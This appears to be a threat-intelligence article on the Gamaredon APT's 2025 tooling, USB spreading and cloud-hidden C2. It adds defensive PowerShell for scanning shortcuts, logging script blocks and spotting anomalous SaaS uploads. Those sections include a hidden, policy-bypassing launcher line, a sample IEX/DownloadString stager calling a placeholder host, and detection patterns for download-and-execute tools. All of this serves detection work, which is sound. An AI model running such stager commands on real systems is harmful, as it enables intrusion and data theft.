Summary

Russia's long-running Gamaredon cyber-espionage group — also tracked as Aqua Blizzard, Armageddon, and BlueAlpha — has substantially modernized its toolkit and command-and-control (C2) practices, according to new research from ESET. Over the course of 2025 the group ran 35 distinct spear-phishing campaigns against Ukraine, rolled out roughly half a dozen new PowerShell downloaders, and adopted layered techniques for concealing its infrastructure behind trusted cloud and tunneling services. The upgrades let the FSB-linked actor mount more frequent and larger operations in the second half of the year, including handing off initial access to fellow Russian APT Turla.

A veteran APT that refuses to age out

Gamaredon has been operating since at least 2013, an unusually long run for a state-aligned threat actor, and it remains one of the Russian government's busiest and most actively evolving groups. Ukraine's Security Service attributes the operation to the 18th Center for Information Security inside Russia's Federal Security Service (FSB). Its targeting has stayed consistent: throughout 2025 its spear-phishing exclusively went after Ukrainian government and military organizations, with the goal of exfiltrating data that could advance Russia's war effort.

ESET frames the group's year in two phases. The first half was largely preparatory. Gamaredon appears to have taken January off — likely because its operators are government employees and Russia clusters many federal holidays in that month — then resumed activity in February. Much of the early year went into building tooling that would pay off later: five new PowerShell programs in the first quarter and one more in the summer. Most are simple downloaders, but one stands out.

PteroPaste and USB-borne spreading

The most capable of the new tools, dubbed PteroPaste, goes beyond basic download-and-execute functionality. It continuously polls for USB drives attached to a compromised host. When it finds one, it tries to copy a malicious downloader script onto the drive. To make the payload look innocuous, it picks a random Word document already on the infected machine, appends a .lnk extension to that filename, and assigns that name to the smuggled loader — so a casual observer is likely to mistake it for an ordinary document.

USB drives have long been a Gamaredon staple for pushing malware both farther geographically and deeper inside target organizations, where more sensitive systems may be air-gapped and otherwise isolated from the internet.

ESET's director of threat research, Jean-Ian Boutin, recommends tightening PowerShell exposure to blunt both PteroPaste and its simpler relatives: "Depending on business needs and user roles, organizations may restrict or remove PowerShell access for non-administrative users, or disable or limit unnecessary scripting capabilities, such as Windows Management Instrumentation (WMI)."

For the USB vector, the mitigations are operational: scan files on removable media, sanitize drives at dedicated stations, or simply block unvetted devices outright.

Hiding C2 behind legitimate services

Alongside its new initial-access malware, Gamaredon has invested heavily in concealing its C2 footprint. The group has started routing activity through Microsoft and Cloudflare tunneling services, and through Cloudflare serverless workers, so that malicious traffic appears to flow to legitimate domains. It also relies on dead-drop resolvers: the malware first contacts a legitimate website whose content the operators control and parses the real C2 address out of that page, so the address never appears in the sample itself, which frustrates analysis and blocklisting. Most recently it has fused the two approaches, stashing its tunneling domains at those dead-drop sites.

Two of Gamaredon's primary stealer tools were also updated to push stolen files into legitimate cloud storage, such as Amazon S3 buckets, while PteroPaste exfiltrates to Dropbox.

That shift undercuts a common defensive assumption. "Defenders can no longer assume that traffic to a trusted platform is inherently safe," said Louis Eichenbaum, federal CTO at ColorTokens. "Instead, they must determine whether that communication is expected, authorized, and consistent with normal application and user behavior." He argues defenders need a detailed grasp of application workflows and communication patterns so they can apply "granular, identity-aware microsegmentation policies that break attack paths and contain compromises before they spread."

Scaling up — and partnering with Turla

With its loaders rebuilt and its infrastructure obscured, Gamaredon used the back half of 2025 to launch markedly more attacks, and bigger ones, than in the first half. Some of that activity was part of an ongoing collaboration with another Russian state APT, Turla (also known as Snake, Venomous Bear, Waterbug, or Uroburos): Gamaredon supplied initial access via its downloaders, and Turla then used that foothold to deploy its heavier Kazuar backdoor.

Technical background

The following is general context on the techniques described above; the specifics of this campaign are limited to what ESET reported and the details listed in the sections above.

USB-borne spreading via lure shortcuts. Windows has not auto-executed content from removable media since AutoRun for USB devices was disabled by default in Windows 7, so malware that abuses removable media drops a small loader plus a disguised shortcut and relies on the user double-clicking it. The malicious .lnk carries a command line, hidden behind a document-like name and icon, that calls a script interpreter, for example:


%windir%\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File <payload>

On the host side, defenders can detect and limit removable-media execution. To audit which drives are removable from PowerShell:


# DriveType 2 = removable disk; Get-CimInstance replaces the deprecated Get-WmiObject
Get-CimInstance -ClassName Win32_LogicalDisk -Filter "DriveType=2" |
  Select-Object DeviceID, VolumeName, Size

Group Policy offers per-class controls under Computer Configuration → Administrative Templates → System → Removable Storage Access: "Removable Disks: Deny execute access" blocks running programs and scripts from USB disks while still allowing files to be read, and "All Removable Storage classes: Deny all access" blocks the devices entirely. The execute-only setting is the one that matches the lure-shortcut technique above without breaking legitimate file transfer.
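The PteroPaste naming trick described earlier (a .lnk that borrows the name of a real Word document, giving a double extension such as report.docx.lnk) and the interpreter-calling shortcut shown above are both checkable from the host side. The following is an added example, not code from ESET's report or from the article, that extends the drive-enumeration snippet: it walks every removable drive, resolves each shortcut's target through the WScript.Shell COM object, and reports shortcuts that carry a document-style double extension, point at a script interpreter, or pass window-hiding or execution-policy-bypass arguments. The extension and interpreter lists are assumptions chosen for illustration.

```powershell
# Added example, not from ESET's report or the article. Flags shortcut files
# on removable drives that look like lure shortcuts of the kind described in
# the text. Extension and interpreter lists are assumptions for illustration.

$DocExtensions = @('.doc', '.docx', '.rtf', '.pdf', '.xls', '.xlsx')
$Interpreters  = 'powershell\.exe|pwsh\.exe|cmd\.exe|wscript\.exe|cscript\.exe|mshta\.exe|rundll32\.exe'
$EvasionArgs   = '-(enc|encodedcommand|w\s+hidden|windowstyle\s+hidden|ep\s+bypass|executionpolicy\s+bypass)'

function Get-SuspiciousRemovableShortcut {
    [CmdletBinding()]
    param(
        # Optional override so the logic can be tested against a fixed folder
        # instead of live removable drives.
        [string[]]$Root = @()
    )

    if (-not $Root) {
        # DriveType 2 = removable disk (Win32_LogicalDisk)
        $Root = Get-CimInstance -ClassName Win32_LogicalDisk -Filter "DriveType=2" |
            ForEach-Object { $_.DeviceID + '\' }
    }

    $shell = New-Object -ComObject WScript.Shell
    foreach ($r in $Root) {
        if (-not (Test-Path -LiteralPath $r)) { continue }
        Get-ChildItem -LiteralPath $r -Filter *.lnk -File -Recurse -Force -ErrorAction SilentlyContinue |
            ForEach-Object {
                $lnk = $shell.CreateShortcut($_.FullName)
                # "report.docx.lnk" -> BaseName "report.docx" -> inner extension ".docx"
                $innerExt = [System.IO.Path]::GetExtension($_.BaseName).ToLowerInvariant()
                $reasons  = @()
                if ($DocExtensions -contains $innerExt) {
                    $reasons += "document-style double extension ($innerExt.lnk)"
                }
                if ($lnk.TargetPath -match $Interpreters) {
                    $reasons += "target is a script interpreter ($($lnk.TargetPath))"
                }
                if ($lnk.Arguments -match $EvasionArgs) {
                    $reasons += 'arguments hide the window or bypass execution policy'
                }
                if ($reasons) {
                    [pscustomobject]@{
                        Path      = $_.FullName
                        Target    = $lnk.TargetPath
                        Arguments = $lnk.Arguments
                        Reasons   = $reasons -join '; '
                    }
                }
            }
    }
}

# Usage: inspect every removable drive currently attached to this host
Get-SuspiciousRemovableShortcut | Format-List
```

A shortcut that trips only the double-extension check may be a user's own habit of saving links; one that trips the interpreter or argument checks as well is the pattern worth quarantining. Pass -Root to point the function at a sanitization station's mount folder instead of enumerating drives.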

Constraining PowerShell. Beyond restricting who can run PowerShell, enabling Constrained Language Mode and turning on script block and module logging gives defenders visibility into the obfuscated one-liners these downloaders favor:


# Enable script block logging via the policy registry path; logged blocks
# appear as event ID 4104 in Microsoft-Windows-PowerShell/Operational
$key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
New-Item -Path $key -Force | Out-Null
Set-ItemProperty -Path $key -Name 'EnableScriptBlockLogging' -Value 1 -Type DWord
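Logging alone only produces records; the value comes from triaging them for the traits a download-and-execute stager exhibits. The following is an added example, not code from ESET's report or the article, that scores script-block text against four indicator families (remote fetch, in-memory execution, encoding/obfuscation, policy or window evasion), runs the scoring over a few constructed sample blocks, and then applies the same function to live 4104 events. The sample strings are constructed for illustration and are not Gamaredon code; the patterns are an assumption about what downloaders of this kind commonly contain.

```powershell
# Added example, not from ESET's report or the article. Triage PowerShell
# script-block log events (ID 4104) for download-and-execute stager traits.
# Sample blocks below are constructed for illustration, not Gamaredon code.

$StagerPatterns = @{
    'remote fetch'         = 'Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|BitsTransfer'
    'in-memory execution'  = '\bIEX\b|Invoke-Expression|\[scriptblock\]::Create'
    'encoding/obfuscation' = 'FromBase64String|-EncodedCommand|-enc\b|-join\s*\(|\[char\]\s*\d+'
    'policy/UI evasion'    = '-ExecutionPolicy\s+Bypass|-ep\s+bypass|-WindowStyle\s+Hidden|-w\s+hidden|-NoProfile|-nop\b'
}

function Get-StagerIndicators {
    param([Parameter(Mandatory)][string]$ScriptText)
    $hits = foreach ($name in $StagerPatterns.Keys) {
        if ($ScriptText -match $StagerPatterns[$name]) { $name }
    }
    # Any two families together (fetch+execute, or encoding+evasion) is the
    # combination a benign admin one-liner rarely shows.
    [pscustomobject]@{
        Categories = @($hits)
        Score      = @($hits).Count
        Suspicious = (@($hits).Count -ge 2)
    }
}

# Constructed samples: one benign, one plaintext stager, one encoded launcher
$samples = @(
    'Get-ChildItem C:\Reports | Where-Object Length -gt 1MB',
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/s.txt")',
    'powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA'
)
foreach ($s in $samples) {
    $r = Get-StagerIndicators -ScriptText $s
    '{0,-5} score={1} [{2}]  {3}' -f $r.Suspicious, $r.Score, ($r.Categories -join ', '), $s
}

# Live use: same triage over the operational log (requires the
# ScriptBlockLogging policy from the snippet above to be enabled)
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 500 -ErrorAction SilentlyContinue |
    ForEach-Object {
        $text = [string]$_.Properties[2].Value   # ScriptBlockText is the 3rd property of a 4104 event
        $r = Get-StagerIndicators -ScriptText $text
        if ($r.Suspicious) {
            [pscustomobject]@{
                Time       = $_.TimeCreated
                Categories = ($r.Categories -join ', ')
                Snippet    = $text.Substring(0, [Math]::Min(120, $text.Length))
            }
        }
    }
```

On the constructed samples the first block scores 0, the second scores 2 (remote fetch plus in-memory execution) and the third scores 2 (encoding plus evasion) even though its payload is opaque, which is why the encoded-launcher flags are scored on their own rather than requiring a visible download call. Tune the pattern table to your estate; Add-Type and Invoke-WebRequest are common in legitimate tooling and belong in an allowlist keyed on script path or signer, not in a global exclusion.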

Living-off-trusted-services C2. When adversaries tunnel through Cloudflare/Microsoft services or exfiltrate to S3 and Dropbox, simple domain blocklists fail. The practical countermeasures are behavioral: baseline which hosts and identities normally talk to which SaaS endpoints, alert on deviations (a workstation suddenly uploading to a Dropbox or S3 endpoint it has never used), and enforce identity-aware microsegmentation to contain lateral movement.
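The baseline-and-deviate approach described above can be prototyped over ordinary proxy logs. The following is an added example, not code from ESET's report or the article: it learns which internal host has previously talked to which destination during a baseline window, then flags upload-sized POST or PUT requests in the review window that go to a cloud-storage or tunneling domain the host has never contacted before. The log lines are constructed, the six-column layout (timestamp, host, user, method, URL, bytes sent) is an assumed format rather than any real proxy's, and the domain list is an assumption drawn from the services named in the text that you would adjust to your own environment.

```powershell
# Added example, not from ESET's report or the article. Baseline host->destination
# pairs from proxy logs, then flag first-seen uploads to cloud storage or
# tunneling domains. Log lines and field layout are constructed assumptions.

# Destinations where a first-seen upload from a host warrants review (assumption)
$WatchedDomains       = '(^|\.)(dropbox\.com|dropboxapi\.com|amazonaws\.com|trycloudflare\.com|devtunnels\.ms)$'
$UploadBytesThreshold = 1MB

function ConvertFrom-ProxyLine {
    # Assumed layout: <timestamp> <host> <user> <method> <url> <bytes_out>
    param([Parameter(Mandatory)][string]$Line)
    $f = $Line -split '\s+'
    [pscustomobject]@{
        Time     = [datetime]$f[0]
        Host     = $f[1]
        User     = $f[2]
        Method   = $f[3]
        Dest     = (($f[4] -replace '^https?://', '') -split '[/:]')[0]   # hostname only
        BytesOut = [int64]$f[5]
    }
}

function Find-AnomalousSaaSUploads {
    param(
        [string[]]$BaselineLines,   # known-good learning window
        [string[]]$CurrentLines     # period under review
    )
    # Baseline: every (host, destination) pair seen during the learning window
    $seen = @{}
    foreach ($e in ($BaselineLines | ForEach-Object { ConvertFrom-ProxyLine $_ })) {
        $seen["$($e.Host)|$($e.Dest)"] = $true
    }
    foreach ($e in ($CurrentLines | ForEach-Object { ConvertFrom-ProxyLine $_ })) {
        $key      = "$($e.Host)|$($e.Dest)"
        $isUpload = ($e.Method -in 'POST', 'PUT') -and ($e.BytesOut -ge $UploadBytesThreshold)
        if ((-not $seen.ContainsKey($key)) -and $isUpload -and ($e.Dest -match $WatchedDomains)) {
            [pscustomobject]@{
                Time   = $e.Time
                Host   = $e.Host
                User   = $e.User
                Dest   = $e.Dest
                MBOut  = [math]::Round($e.BytesOut / 1MB, 1)
                Reason = 'first-seen upload to cloud storage / tunnel domain'
            }
        }
    }
}

# Constructed sample data
$baseline = @(
    '2025-09-01T08:02:11 ws-0412 jdoe   GET  https://www.example.invalid/news 812',
    '2025-09-01T08:05:40 ws-0412 jdoe   POST https://api.dropboxapi.com/2/files/upload 2400000',
    '2025-09-02T09:11:02 ws-0977 asmith GET  https://login.microsoftonline.com/ 3011'
)
$today = @(
    '2025-10-14T10:15:33 ws-0412 jdoe   POST https://api.dropboxapi.com/2/files/upload 5200000',
    '2025-10-14T10:16:01 ws-0977 asmith PUT  https://exfil-bucket.s3.eu-central-1.amazonaws.com/archive.zip 48000000',
    '2025-10-14T10:17:45 ws-0977 asmith GET  https://www.example.invalid/ 642'
)

Find-AnomalousSaaSUploads -BaselineLines $baseline -CurrentLines $today | Format-Table -AutoSize
```

On the constructed data only the ws-0977 PUT to the S3 bucket is reported: ws-0412's Dropbox upload is suppressed because that host already used Dropbox during the baseline window, which is exactly the "expected and consistent with normal behavior" test the ColorTokens quote above calls for. In production the baseline should be keyed on identity as well as host and aged out over time, so a long-dormant pair does not remain trusted forever.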

Bottom line

Gamaredon's 2025 evolution shows a mature APT deliberately retooling: new PowerShell downloaders, USB-based propagation into air-gapped segments, C2 cloaked inside legitimate cloud and tunneling platforms, and operational handoffs to Turla. Defenses that depend on static indicators or on trusting reputable domains will lag this group. Restricting PowerShell and WMI for non-admin users, controlling removable media, and adopting behavior- and identity-based monitoring of SaaS traffic are the measures best matched to how this actor now operates.